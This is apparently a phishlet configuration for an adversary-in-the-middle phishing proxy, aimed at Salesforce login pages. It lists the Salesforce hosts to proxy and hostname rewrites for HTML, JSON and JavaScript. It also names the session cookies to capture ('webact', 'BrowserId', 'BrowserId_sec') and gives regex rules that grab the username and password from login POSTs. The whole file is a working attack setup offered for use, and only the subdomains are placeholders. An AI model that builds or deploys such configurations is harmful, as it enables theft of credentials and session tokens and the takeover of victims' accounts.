author: '@JRodriguez556'
min_ver: '2.3.0'
proxy_hosts:
  - {phish_sub: 'EXAMPLE', orig_sub: 'EXAMPLE', domain: 'my.salesforce.com', session: true, is_landing: true}
  - {phish_sub: 'EXAMPLE', orig_sub: 'EXAMPLE', domain: 'file.force.com', session: true, is_landing: false}
  
sub_filters:
  - {triggers_on: 'EXAMPLE.my.salesforce.com', orig_sub: 'EXAMPLE', domain: 'my.salesforce.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'EXAMPLE.my.salesforce.com', orig_sub: 'EXAMPLE', domain: 'my.salesforce.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true}
auth_tokens:
  - domain: 'salesforce.com'
    keys: ['webact' , 'BrowserId' , 'BrowserId_sec']
credentials:
  username:
    key: 'username'
    search: '(.*)'
    type: 'post'
  password:
    key: 'pw'
    search: '(.*)'
    type: 'post'
login:
  domain: 'EXAMPLE.my.salesforce.com'
  path: '/secur/contentDoor'
